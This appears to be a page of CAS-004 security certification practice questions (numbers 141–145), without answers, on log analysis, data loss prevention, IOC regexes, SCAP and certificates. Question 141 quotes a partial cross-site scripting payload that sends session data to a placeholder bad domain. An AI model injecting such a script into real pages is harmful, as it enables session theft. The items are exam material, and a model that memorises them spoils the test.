CAS-004 Exam Question 141

A threat analyst notices the following URL while going through the HTTP logs.
http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src="http:
//baddomain~~~/session;
Which of the following attack types is the threat analyst seeing?
  • CAS-004 Exam Question 142

    A security engineer at a company is designing a system to mitigate recent setbacks caused competitors that are beating the company to market with the new products. Several of the products incorporate propriety enhancements developed by the engineer's company. The network already includes a SEIM and a NIPS and requires 2FA for all user access. Which of the following system should the engineer consider NEXT to mitigate the associated risks?
  • CAS-004 Exam Question 143

    A systems administrator was given the following IOC to detect the presence of a malicious piece of software communicating with its command-and-control server:
    post /malicious. php
    User-Agent: Malicious Tool V 1.0
    Host: www.rcalicious.com
    The IOC documentation suggests the URL is the only part that could change. Which of the following regular expressions would allow the systems administrator to determine if any of the company hosts are compromised, while reducing false positives?
  • CAS-004 Exam Question 144

    An organization wants to perform a scan of all its systems against best practice security configurations.
    Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for fill automation? (Choose two.)
  • CAS-004 Exam Question 145

    A systems administrator at a web-hosting provider has been tasked with renewing the public certificates of all customer sites. Which of the following would BEST support multiple domain names while minimizing the amount of certificates needed?